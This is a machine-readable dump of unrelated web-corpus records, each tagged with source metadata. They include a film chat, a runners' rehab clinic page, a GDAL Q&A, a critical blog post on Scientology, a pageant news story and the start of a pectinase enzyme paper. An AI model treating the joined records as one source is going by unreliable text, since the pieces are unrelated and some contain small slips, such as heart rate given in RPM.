Funding Information
===================
We acknowledge support from: the EIPHI Graduate School (ANR-17-EURE-0002);Région Bourgogne Franche-Comté; European Research Council (ERC) (682032-PULSAR); Volkswagen Foundation (NeuroQNet); French Investissements d’Avenir programme, project ISITE-BFC (contract ANR-15-IDEX-0003).
| mini_pile | {'original_id': '9ccf4311664b33a7441a675ac1c070c1a4d332dba538c6544d440b02ad943955'} |
I want to see the movie WarCraft, did you see it?
No, I never heard of it.
It's an action fantasy film based on a game.
You mean like a video game.
Yeah for the computer.
Have you played the game?
No, but my son has been for years.
Did he see the movie?
Yes, he said it was great.
Who is in it?
Not sure of all the actors but I know the one guy is in the History Channel show Vikings.
He want s to watch it when we rent the DVD with us again.
I just hope it's not very long.
Did you search the movie.
No I will have to search the movie .
It wall probably be about two hours.
Yea most new ones are.
Is it about a war between monsters or robots?
Well fantasy type creatures I think and humans.
I will definitely have to look it up.
| the_stack | {'hexsha': '1b580490b24cd24598f14a7536daa6c86a78935d', 'size': '730', 'ext': 'txt', 'lang': 'Text', 'max_stars_repo_path': 'ext/self_dialogue_corpus/dialogues/22170.txt', 'max_stars_repo_name': 'TeamSPoon/logicmoo_nlu', 'max_stars_repo_head_hexsha': '5c3e5013a3048da7d68a8a43476ad84d3ea4bb47', 'max_stars_repo_licenses': "['MIT']", 'max_stars_count': '6', 'max_stars_repo_stars_event_min_datetime': '2020-01-27T12:08:02.000Z', 'max_stars_repo_stars_event_max_datetime': '2020-02-28T19:30:28.000Z', 'max_issues_repo_path': 'ext/self_dialogue_corpus/dialogues/22170.txt', 'max_issues_repo_name': 'TeamSPoon/logicmoo_nlu', 'max_issues_repo_head_hexsha': '5c3e5013a3048da7d68a8a43476ad84d3ea4bb47', 'max_issues_repo_licenses': "['MIT']", 'max_issues_count': '1', 'max_issues_repo_issues_event_min_datetime': '2020-02-02T13:12:34.000Z', 'max_issues_repo_issues_event_max_datetime': '2020-02-02T13:12:34.000Z', 'max_forks_repo_path': 'ext/self_dialogue_corpus/dialogues/22170.txt', 'max_forks_repo_name': 'TeamSPoon/logicmoo_nlu', 'max_forks_repo_head_hexsha': '5c3e5013a3048da7d68a8a43476ad84d3ea4bb47', 'max_forks_repo_licenses': "['MIT']", 'max_forks_count': '', 'max_forks_repo_forks_event_min_datetime': '', 'max_forks_repo_forks_event_max_datetime': '', 'avg_line_length': '34.7619047619', 'max_line_length': '89', 'alphanum_fraction': '0.7520547945', 'original_id': 'c5aba0ce396b68d62825c0db82c2021c6ef94ab684934b3330b8cb938b8ce4fe'} |
Runners Rehab
When a runner is faced with an injury, one of the most devastating things is an inability to keep running and maintain the training. Usually in this case a complete rest from running activities is advised by physical therapists. However, a complete rest from running is not a good idea for quick runners rehab. To make your body move right as soon as possible let’s look at the most effective cross-training options: water running, spinning, and Alter-G treadmill. These methods will improve your recovery and will keep you in touch with the training process without having a long unmotivated break.
Water Running
Runners Rehab Runners Clinic
Running in the pool can be useful for those who cannot run because of injury but still want to train. It is probably the safest cross-training option for lots of runners’ injuries. Because there is no impact on the body in the pool, running can be maintained in the water with as much time as running on a hard surface. Resistance provided by the water reduces the risks of aggravating trauma.
Tips and tricks for water running:
• In the pool your turnover will be slow but try to simulate your normal running style, do not ‘paddle’. Try to let the bottoms of your feet kick the water behind you and let your legs push you forward. Take short, quick steps, because a fast cadence intensifies the workout
• Remember that in the water your heart rate will be at least about 10% lower than when running on land with same intensity. Also, keep in mind that water is more resistant than air and your pace will decrease accordingly. Perceived exertion to gauge your effort in the water
• If you are a beginner water runner, you may apply an aqua jogging belt or get rid of it if you want to increase the routine
• In addition to exercises in a deep end of the pool, you may use the shallow end to train without the risk of unnecessary impact by performing a few sets of basic drills
• Also, keep staying attentive because you might enjoy the water running so much that you would not want to stop exercising!
Runners Rehab Runners Clinic
The next best cross-training option for improving runners rehab is a spin class. The training in a spin class is lot more effective at replicating running routines than interruptive road cycling.
Since there is no impact on the body in spinning it allows going further without fear of been re-injured. Spinning accelerates the recovery and maintaining fitness by literally mixing up interval workouts and tempo “runs” on the bike every other day.
Spinning workouts has to be about 150% longer lasting than the regular running workouts to achieve an equivalent effort. While spinning try to use a heart-rate monitor and make sure that your heart rate is in the limits of a proper cardio zone. Usually your heart rate would be about 15 RPM lower than when running.
Alter-G Treadmill
Runners Rehab Runners Clinic
Alter-G anti-gravity treadmill is one of the most innovative machines in the history of physical therapy. This anti-gravity devise lovers the body weight up to 90%, which gives an opportunity for a runner to bypass the injury by allowing replicating regular running workouts at a fraction of a body weight.
Lowering the body weight up to 90-93% limits the pounding on the legs, accelerating quicker recovery at the same time still receiving the fitness benefit. More often Alter-G course starts from lower percentage of your body weight, increasing the weight gradually until normal.
The Alter-G helps not only in case of trauma, but also is a good recovery device, especially between the long roads, like marathon or half-marathon. The key idea about it is the better you rehab, the better you will run.
For most runners, access to Alter-G antigravity treadmill is limited, but at Dynamic Neuromuscular Rehabilitation in NYC, it could be rented out if you want to salvage your hard-earned fitness and return to running on land as quickly as possible.
Cross Training for Runners
There is a lot of buzz in the media about the importance of cross training for runners. Running is a unidirectional physical activity which creates muscle imbalances in majority of runners. A runner with perfect mechanics and perfect technique is an exception to the rule. Therefore, we agree that cross training is a good idea as long as this cross training is running and patient specific. When the runner is injured and he has decreased or stopped running it’s important that the cross training for runners is specific to runners deficiency. The biomechanical assesmen or computerized gait analysis may be of value. Frontal plane deficits, poor balance and proprioception, muscle imbalance and sticky feet are very common among runners.
DNR being a full gait and motion analysis lab we have developed specific programs which fit different types of runners. Every program is individualized based on biomechanical profile, running style, foot type, and injury relationship.
At DNR we don’t look at necessary mileage decrease as down time. Our technology and expertise can turn this down time into improvement of running efficiency.
Should You Invest In A Gait Analysis?
130 West 42 Street Suite 1055, New York NY 10036
Dynamic ultrasonography examination demonstrating
the full thickness tear and already occurring muscle atrophy
due to misdiagnosis and not referring the patient
to proper diagnostic workup
Demonstration of how very small muscle defect is made and revealed
to be a complete tear with muscle contraction
under diagnostic sonography (not possible with MRI)
Complete tear of rectus femoris
with large hematoma (blood)
Separation of muscle ends due to tear elicited
on dynamic sonography examination
You can call
or Send message | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '168', 'language_id_whole_page_fasttext': "{'en': 0.9483084678649902}", 'metadata': "{'Content-Length': '609251', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:KX466ECWJIUPICG7T7TGNR2IHXT524ZV', 'WARC-Concurrent-To': '<urn:uuid:e1469279-b693-4f9b-adc3-0fbdd7a76a98>', 'WARC-Date': datetime.datetime(2020, 4, 4, 1, 22, 50), 'WARC-IP-Address': '104.131.185.146', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:MFKGVPHUAKJLLPQJS2DVJDE5NUENTT5Y', 'WARC-Record-ID': '<urn:uuid:edc21cb4-7cc8-41bc-8e9a-745d54340c55>', 'WARC-Target-URI': 'https://nydnrehab.com/sports-medicine/runners-clinic/runners-rehab/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:372c9fda-0291-4876-9d9e-854966dbe3a1>', 'WARC-Truncated': None}", 'previous_word_count': '1147', 'url': 'https://nydnrehab.com/sports-medicine/runners-clinic/runners-rehab/', 'warcinfo': 'isPartOf: CC-MAIN-2020-16\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March/April 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-152.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.04194003343582153', 'original_id': 'b3e22070e4fe9ccdc7db15fed2c7ecc498cdb79d9b9d3734158351f8273d7d97'} |
shape quiz
Can You Pass This Shape Quiz?
Our shape quiz, Can you pass it? Being able to identify an unusual form is not just fun, it’s potentially a sign of great intellect.
Our team designed this quiz to be both fun and informative. Featuring great graphics, a multiple s choice format and the correct shape answers, the quiz is sure to lead you towards deeper understanding of some really interesting designs.
More Shape Resources
Need more? Please visit our friends at the Cloud Appreciation Society.
Want to understand pattern recognition in animals? This Wikipedia entry discusses it and describes how patterns need to get matched by memories in order to make connections.
What about neural networks and machine vision? Turns out MIT has a piece on that, which reveals how machines are tricked in object recognition the same way that mere humans are.
Jennifer Markert | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9060202240943908}", 'metadata': "{'Content-Length': '34758', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:N3G5TE6KTMYSKHYFTXHIYTZO4W2PH4SI', 'WARC-Concurrent-To': '<urn:uuid:1ce2ff78-9990-4936-bc1b-f7db9388fddc>', 'WARC-Date': datetime.datetime(2017, 9, 19, 19, 2, 31), 'WARC-IP-Address': '50.116.70.42', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:HF5RT6D7MILMCKB244FJIRT6CJNSX7F2', 'WARC-Record-ID': '<urn:uuid:d41d95e0-8a42-40b0-9e46-b13612053c1c>', 'WARC-Target-URI': 'https://curiousmatic.com/can-pass-shape-quiz/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:dc290b81-73aa-4f4c-8953-949f6f091fad>', 'WARC-Truncated': None}", 'previous_word_count': '144', 'url': 'https://curiousmatic.com/can-pass-shape-quiz/', 'warcinfo': 'robots: classic\r\nhostname: ip-10-142-152-56.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-39\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for September 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.09214669466018677', 'original_id': 'e209098880d61ce713e4a7fba334ab44e77054ff013f35cafc6d1a4dbcdd8e7b'} |
Q:
Georeferencing uneven/irregularly gridded rasters using GDAL?
I'm trying to take a set of NetCDFs and turn them into georeferenced datasets using GDAL.
However, the only Geospatial data is a set of 2-D lat/lon arrays. The projection type is not lat/lon. THe arrays give the lat/lon of every individual cell.
I can't use a geotransform to reference the data because of the irregular gridding.
How can I create a dataset (such as a GeoTiff) that properly references the data?
Ideally I would then warp to some even grid.
I tried using an even spread of Ground Control Points, but the resulting GeoTiff did not display correctly... Despite giving GCPs up to 90 deg lat, ArcMap claims the GTiff has an extent ending at 70 deg latitude...
I was able to solve the issue using gdalwarp -geoloc as suggested. I created 3 VRTs (1 with cell values, 1 with latitude, 1 with longitude), and wrote the lat/lon vrts in a geoarrays in the data vrt metadata. Then using gdalwarp -geoloc worked like a charm.
The issue with extent was unrelated and due simply to the large difference between the original coordinate system and lat/lon. It was solved by explicitely stating the extent instead of having GDAL try to guess what it should be. (i.e. I added -te -180 0 180 90 to the gdalwarp line)
A:
gdalwarp -geoloc allows you to use the complete 2d-array of latlon as georeference. With that, you can use any target CRS to reproject your data to a commonly used projection.
See my answer to this question for an example:
How to match a raster NetCDF data with a vector layer in QGIS?
| mini_pile | {'original_id': '8f8a6e65164a18fff0035879c4793f8ecc2354e5993a4e0147e53bf027ddc356'} |
Suggest a new domain for SMART
If you miss a domain in SMART, you can suggest this using the following form. Please give your E-Mail adress in case of problems. It helps us a lot, if you give an alignment which we can use as a start-up.
Your E-Mail adress
The name of the domain (short)
Definition (where does the name come from)
Description (what does the domain do, if known)
Remarks (why should this domain in etc...)
Literature about this domain
Upload the alignment (if any) | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.8794196844100952}", 'metadata': "{'Content-Length': '4647', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:VW4245E5G2AAYZI7RZGPUYYRDQFG25H5', 'WARC-Concurrent-To': '<urn:uuid:ec28d593-5eb2-4ade-81fc-fa44f8d9c6c7>', 'WARC-Date': datetime.datetime(2014, 7, 24, 14, 36, 29), 'WARC-IP-Address': '194.94.44.106', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:YS2U5OOEPNYAOSL7XPBCVWA3BXKJ65AT', 'WARC-Record-ID': '<urn:uuid:40e92f48-859c-4fdc-a7b2-0f3f2670947e>', 'WARC-Target-URI': 'http://smart.embl-heidelberg.de/change_db/suggest_domain.shtml', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:3a505298-3148-4370-925d-d5f980f609b8>', 'WARC-Truncated': 'length'}", 'previous_word_count': '82', 'url': 'http://smart.embl-heidelberg.de/change_db/suggest_domain.shtml', 'warcinfo': 'robots: classic\r\nhostname: ip-10-33-131-23.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-23\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for July 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.7273356914520264', 'original_id': '046160757b2622e925ae031324f99b6543dde79772282440369b066637797a12'} |
Sunday, June 1, 2008
Scientology Fakes
Fake evidence. Fake threats against themselves.
1. You know, this is all the fault of "wog" (non-Scientology) law.
When someone says something negative about the church, "wog" law actually permits them to do so if the statements are true!
This is so wrong! In a Scientology World, any negative statements about the church would be punished--especially if true.
Framing people is the only way for the Church of Scientology to correct this horrible injustice.
2. The 3rd edition (1996, red/orange hardcover) of 'L. Ron Hubbard, Messiah or Madman?' has a new Index, and it's convenient to use to track down the numerous quotes from old timer John Sanborn.
Brian Ambry's 'Brainwashing Manual Parallels' is worth looking over. The first page of its End Notes was particularly informative, re. Hubbard's Brainwashing manual.
3. Re: Scientology Justice-Committee of Evidence.
Just so everyone knows, I am a member in good standing with the church of scientology. That's probably because they don't know what I'm actually thinking or that I support the efforts of blogs like this and the incredible Anonymous movement. On behalf of any sane scientologists out there I would like to apologize on the behalf of my members and agree that most of your information is accurate, to say the least.
However, while real justice is rare in the church, it is not set up to be that way. I have personally helped (as a silent advocate and Scientology Ethics/Policy wonk) several people within the church who were getting railroaded by so-called Ethics Inquiries.
I apologize for my lack of citations; I simply don't have access to the policies that I've used before to help the people I have in the past. But, if you're curious, read on.
The fact that any evidence is admissible is true. The statement that the accused has no right to face his accusers or see any evidence presented against him is false, according to policy - but not according to practice.
If one is to defend oneself effectively against an ethics board (or whatever they're calling themselves these days) one is perfectly able to demand to see all evidence against them, as well face their accusers; that right is clearly stated many times in policies regarding a sciengologist's rights in ethics actions.
But know this; the accused should also be prepared to be as ruthless and devious as the accusers.
My advice to anyone under a Committee of Evidence is simple: Be prepared. Keep copies of all records of your stats and their graphs. If you're an auditor, make copies of all Well Done sessions AND subsequent Success Stories from your Pre-Clears (those receiving counseling for the uninitiated in Scientology Slang)
If you even suspect that you might be under investigation (and if you're doing well, you will be, trust me) make certain you do your own personal surveillance work. Meaning, if you're being interviewed on or off the meter, get a miniature digital recorder and USE IT. Hell, if you can get video, do it.
This would be almost impossible in the Sea Organization, but in a Class V org or mission, it's easy to do and will save your ass, because ANY evidence is admissible.
So, to any Scientology Staff with the balls to read this, hat yourself up on what your rights are as stated in your Staff Status I & II training, then read up on Comm-Evs and Justice stuff ASAP in your spare time and DOCUMENT EVERYTHING you do. At least, all the good stuff. ;)
I was a very good student. I used to be on staff in and out of the Sea Org. Anyone dumb enough to join needs to learn the hard way, I guess. I had heard it all and I still joined. It takes time and a lot of hard knocks before a True Believer has the epiphany that he is working for psychotic assholes.
Continued in next post
4. (continued from previous post)
All that aside, a lot of Scientology has helped me. Maybe Hubbard's success as a writer came from a deep, if possibly cynical, understanding of the human mind.
Maybe it auditing is electronically boosted hypnosis that releases some super-endorphin that lasts for weeks, months - even years. I really don't care if Hubbard was a nutter. I have had auditing and it was the happiest time in life. I want it back, but I've become estranged from the church because of their blatantly evil disregard for personal dignity and human rights of their most valuable people - auditors and other staffers working for less than Sea Org wages for decades who never get paid for all the good they manage to get done despite the suppression of their superiors.
Most people who joined staff wanted to help others while getting help themselves. All they end up doing is fighting for their sanity. But Hubbard was right about a lot things. To quote (I think)"Only the tigers survive in this universe, and even they have a hard time of it."
So if you've got the balls and self esteem of a giant and the single-mindedness of a sniper, you might have a chance of making it on staff. Oh, and a "moonlighting" job.
Apparently the PR has gotten so bad that orgs and missions in California are recruiting new and ex-staff and auditors, especially auditors, by promising fewer hours and a guaranteed, well-paying job at a local WISE member run business.
Maybe they're going sane. Please, keep blogging, keep Anonymous alive and fighting and you may end up actually turning the C of S into a real, working force for good.
| dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '1038', 'language_id_whole_page_fasttext': "{'en': 0.9742226004600524}", 'metadata': "{'Content-Length': '90299', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:JVLE4CGRRQAEV6LAYCWD4DT4DULOP6YY', 'WARC-Concurrent-To': '<urn:uuid:ca74c7ae-0930-43a1-9b00-c62a264afe94>', 'WARC-Date': datetime.datetime(2021, 4, 20, 22, 14, 16), 'WARC-IP-Address': '172.217.13.225', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:YMQWPLKCYVU6V4Y32ZFJ4T4FC4XP2CRW', 'WARC-Record-ID': '<urn:uuid:e3b907b5-cae5-4de1-b9e8-0812ae801f6f>', 'WARC-Target-URI': 'https://askthescientologist.blogspot.com/2008/06/scientology-fakes.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:07446ed9-8bf0-4b66-b4f9-20c0a59e56cb>', 'WARC-Truncated': None}", 'previous_word_count': '2071', 'url': 'https://askthescientologist.blogspot.com/2008/06/scientology-fakes.html', 'warcinfo': 'isPartOf: CC-MAIN-2021-17\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for April 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-190.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.055606305599212646', 'original_id': 'df49939a882d8b31b14f03343cc924358b781f91f28b16fbd14c7bfc4862f3cc'} |
What would you like to know?
Share this Story
Miss Universe 2012 crowned: Congrats, Olivia Culpo!
Culpo is America's first Miss Universe since '97
Olivia Culpo is the luckiest (and most determined) girl in the world.
Culpo is America's first Miss Universe since '97Miss Universe is more than just a title, it's actually a well-paying job.
Aside from an undisclosed salary, the winner is also treated to the kind of extensive wardrobe that would even make Barbie jealous, insane amounts of beauty products (she has to keep her hair looking stellar), and a luxury apartment in Manhattan... no doubt somewhere in or near one of Donald Trump's many real estate investments.
This year, that lucky girl is Rhode Island's Olivia Culpo. Pretty good for an off-the-cuff idea.
Culpo was never a pageant girl. When she told her family she was entering the Miss Rhode Island competition last year, it was the first time Olivia had shown interest in such things.
"We didn't know a thing about pageants," her father told Newsday.
The stunning Olivia won Miss Rhode Island in a $20 rented dress (with a hole in it). It wasn't until after she became Miss Rhode Island that she began any other prep. But she knew she'd need it if she wanted to win Miss USA, too. She took to dieting, working out, and studying her current events flashcards with the same dogged determination that led to her mastering the cello as a second-grader.
This girl is on fire.
Even after a minor stumble on the big night, Olivia Culpo managed to pull off the victory. Her kind, inspiring answer during the interview portion just before she was crowned probably helped. When Culpo was asked if she had any regrets, she knew just the right answer.
In winning Miss Universe, Olivia will no longer perform her Miss USA duties. Her Miss USA runner-up, Miss Maryland Nana Meriwether, will now take over that title. Before Culpo's win, an American had not claimed the Miss Universe title since Brook Lee in 1997.
The pageant returned to Las Vegas this year after 2011's show was held in Sao Paulo. NBC aired the pageant, which was streamed in more than 100 countries. Singer CeeLo Green and San Francisco Giants' Pablo Sandoval were among the 10 judges. Twenty-year-old Olivia Culpo, a sophomore at Boston University, beat out 88 competitors to take home the title.
Congratulations, Olivia Miss Universe!
Image courtesy of
New in Entertainment
SheKnows is making some changes! | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '94', 'language_id_whole_page_fasttext': "{'en': 0.9808363318443298}", 'metadata': "{'Content-Length': '106859', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:NLAFY325JHFXK4273KRMKQDUVCUEPNS7', 'WARC-Concurrent-To': '<urn:uuid:439df4ad-32c1-4ff3-8983-aed709b0880c>', 'WARC-Date': datetime.datetime(2016, 7, 29, 21, 47, 36), 'WARC-IP-Address': '72.21.92.101', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:EQLFBD74GNEG5HZ2DTZ65XIB5GRBL42V', 'WARC-Record-ID': '<urn:uuid:a90dc88b-1155-4b03-a583-fae67ba4046b>', 'WARC-Target-URI': 'http://www.sheknows.com/entertainment/articles/980279/miss-usa-olivia-culpo-is-crowned-miss-universe-2012', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:b9f239c1-081a-4c7b-a398-fe75acfa38b1>', 'WARC-Truncated': None}", 'previous_word_count': '520', 'url': 'http://www.sheknows.com/entertainment/articles/980279/miss-usa-olivia-culpo-is-crowned-miss-universe-2012', 'warcinfo': 'robots: classic\r\nhostname: ip-10-185-27-174.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-30\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for July 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.021442174911499023', 'original_id': '2bc3d780b362f53f919a570bd22f38b011ae33e5ea19d7c552a47ca71eb2a9da'} |
1. Introduction {#sec1-ijms-21-02100}
===============
Pectin is one of the most important components in the middle lamella and cell wall of plants, and accounts for one-third of the dry weight of plant material \[[@B1-ijms-21-02100],[@B2-ijms-21-02100],[@B3-ijms-21-02100]\]. It plays multiple functions during plant growth, including morphogenesis, defense, cell adhesion, cell wall structure, cellular expansion, and so on \[[@B2-ijms-21-02100],[@B4-ijms-21-02100]\]. As one of the most complex polysaccharides in plant cell walls, pectin exists in a variety of structures such as homogalacturonan (HG), xylogalacturonan, rhamnogalacturonan I and rhamnogalacturonan II, among which HG is the most abundant (\<65%) \[[@B2-ijms-21-02100],[@B3-ijms-21-02100]\].
In nature, pectin is degraded by pectin-degrading enzymes \[[@B5-ijms-21-02100],[@B6-ijms-21-02100],[@B7-ijms-21-02100],[@B8-ijms-21-02100],[@B9-ijms-21-02100]\]. Due to complexity and heterogeneousity, complete degradation of pectin requires the combined action of esterases, lyases, and hydrolases \[[@B5-ijms-21-02100],[@B6-ijms-21-02100],[@B7-ijms-21-02100],[@B8-ijms-21-02100],[@B9-ijms-21-02100]\]. Esterases mainly include pectin methylesterases (EC 3.1.1.11), acetylesterases (EC 3.1.1.6), and feruloyl esterases (EC 3.1.1.73), which remove methyl, acetyl, and feruloyl of pectin, respectively. Pectate lyases (EC 4.2.2.2) and pectin lyases (EC 4.2.2.10) catalyze the cleavage of the α-1,4 glycosidic bond of pectin and pectate by transeliminative reactions, respectively, to produce Δ4,5 unsaturated products. Hydrolases cleave the α-1,4-linkage of pectin and pectate, including endo-polygalacturonases (EC 3.2.1.15), exo-polygalacturonases (EC 3.2.1.67), rhamnogalacturonases (EC 3.2.1.171), etc. \[[@B5-ijms-21-02100],[@B6-ijms-21-02100],[@B7-ijms-21-02100],[@B8-ijms-21-02100],[@B9-ijms-21-02100]\]. Among the pectinolytic enzymes, endo-polygalacturonases (endo-PGs) are most extensively investigated, and are classified into family GH 28 of CAZy (carbohydrate-active enzymes database) based on sequence and structure similarity \[[@B5-ijms-21-02100],[@B6-ijms-21-02100],[@B7-ijms-21-02100],[@B8-ijms-21-02100],[@B9-ijms-21-02100]\]. Most characterized endo-PGs are from fungi, such as the species of *Aspergillus* and *Penicillium*. For example, some endo-PGs were purified and characterized from different genera of *Aspergillus*, including *A. niger* \[[@B10-ijms-21-02100],[@B11-ijms-21-02100],[@B12-ijms-21-02100]\], *A. awamori* \[[@B13-ijms-21-02100]\], *A. carbonarius* \[[@B14-ijms-21-02100]\], *A. aculeatus* \[[@B15-ijms-21-02100]\], and *A. flavus* \[[@B16-ijms-21-02100]\]. Some endo-PGs from different species of *Penicillium* were also investigated, for example, *Penicillium oxalicum* CZ1028 \[[@B17-ijms-21-02100]\], *Penicillium* sp. CGMCC 1669 \[[@B18-ijms-21-02100]\], and *Penicillium occitanis* \[[@B19-ijms-21-02100]\]. Many endo-PGs from other fungi species were characterized as well, for example, *Neosartorya fischeri* P1 \[[@B20-ijms-21-02100]\], *Bispora* sp. MEY-1 \[[@B21-ijms-21-02100]\], *Achaetomium* sp. Xz8 \[[@B22-ijms-21-02100]\], *Talaromyces leycettanus* JCM 12802 \[[@B23-ijms-21-02100]\], and *Thielavia arenaria* XZ7 \[[@B24-ijms-21-02100]\].
Pectinases have found many applications in the industry of food, paper and pulp, and textiles \[[@B5-ijms-21-02100],[@B6-ijms-21-02100],[@B7-ijms-21-02100],[@B8-ijms-21-02100],[@B9-ijms-21-02100]\]. Considering the fact that pectinases account for a considerable proportion of enzyme markets, efforts to find new polygalacturonases with good properties are needed. *Aspergillus nidulans* is one species of filamentous fungi in the phylum Ascomycota, which grows mainly on dead or decaying plant material. The *A. nidulans* genome was sequenced in 2005 \[[@B25-ijms-21-02100]\], and the putative plant cell wall polysaccharide degrading enzymes were assigned to 166 ORFs (open reading frames) \[[@B26-ijms-21-02100]\]. A later study in which 72 ORFs of *A. nidulans* were expressed in *Pichia pastoris* confirmed the predicted functions for them \[[@B27-ijms-21-02100],[@B28-ijms-21-02100]\]. Thus, *A. nidulans* has become a good source for mining novel polysaccharide-degrading enzymes. Some polysaccharide-degrading enzymes from *A. nidulans* were identified and characterized \[[@B28-ijms-21-02100],[@B29-ijms-21-02100]\]. However, no endo-PGs from *A. nidulans* were investigated functionally and in detail. Multiple sequence alignment and phylogenetic analysis of AnEPG (an endo-α-1,4-polygalacturonase from *A. nidulans*, GeneBank accession number AN8327.2) and other GH 28 endo-polygalacturonases implied that AnEPG is different from others \[[@B15-ijms-21-02100],[@B17-ijms-21-02100],[@B22-ijms-21-02100],[@B24-ijms-21-02100],[@B30-ijms-21-02100],[@B31-ijms-21-02100]\] ([Figures S1 and S2, Supplemental files](#app1-ijms-21-02100){ref-type="app"}). In this study, AnEPG was overproduced in *P. pastoris*, and biochemically characterized in detail for the first time. Moreover, characterizing the hydrolysis products and modelling the structure of this enzyme were carried out.
2. Results and Discussion {#sec2-ijms-21-02100}
=========================
2.1. Sequence Alignment and Phylogenetic Analysis of AnEPG with Other GH 28 endo-PGs {#sec2dot1-ijms-21-02100}
------------------------------------------------------------------------------------
Though many polysaccharide-degrading enzymes from *A. nidulans* were characterized, so far no endo-PGs from this fungus have been characterized in detail \[[@B28-ijms-21-02100],[@B29-ijms-21-02100]\]. According to the genome sequence of *Aspergillus nidulans* FGSC A4, the gene (Gene ID: 2868744) encoding a hypothetical protein (GenBank accession number AN8327.2) belonging to the GH 28 family, was named as AnEPG (endo-α-1,4-polygalacturonase from *Aspergillus nidulans*) in the current study. A 19-residue signal peptide with a putative processing site (VMA-TP) was identified using the SignalP 4.1 server. The potential *O*- and *N*-glycosylation sites were predicted to be Thr27, Thr28, Ser30, Thr32, Ser38, and Asn154, Asn192, Asn371, respectively.
Homologous GH 28 endo-PGs were found by subjecting them to a BLAST search of the sequence of AnEPG. Multiple sequence alignment and the phylogenetic analysis of AnEPG and other GH 28 endo-PGs revealed that AnEPG is different from other endo-polygalacturonases ([Figures S1 and S2, Supplemental files](#app1-ijms-21-02100){ref-type="app"}). AnEPG exhibited the highest sequence identity to a hypothetical protein from *Aspergillus mulundensis* (GenBank accession no ABL01533 XP026600476.1) (91.8%), and 76.25% sequence identity to EPG4 from *Penicillium oxalicum* CZ108 \[[@B17-ijms-21-02100]\] ([Figure S1, Supplemental files](#app1-ijms-21-02100){ref-type="app"}). Four putative disulfide bonds are formed by Cys39 and Cys57, Cys217, and Cys233, Cys345, and Cys350, Cys369 and Cys378, three of which (Cys39-Cys57, Cys217-Cys233, Cys345-Cys350) are highly conserved among GH 28 endo-PGs ([Figure S1, Supplemental files](#app1-ijms-21-02100){ref-type="app"}).
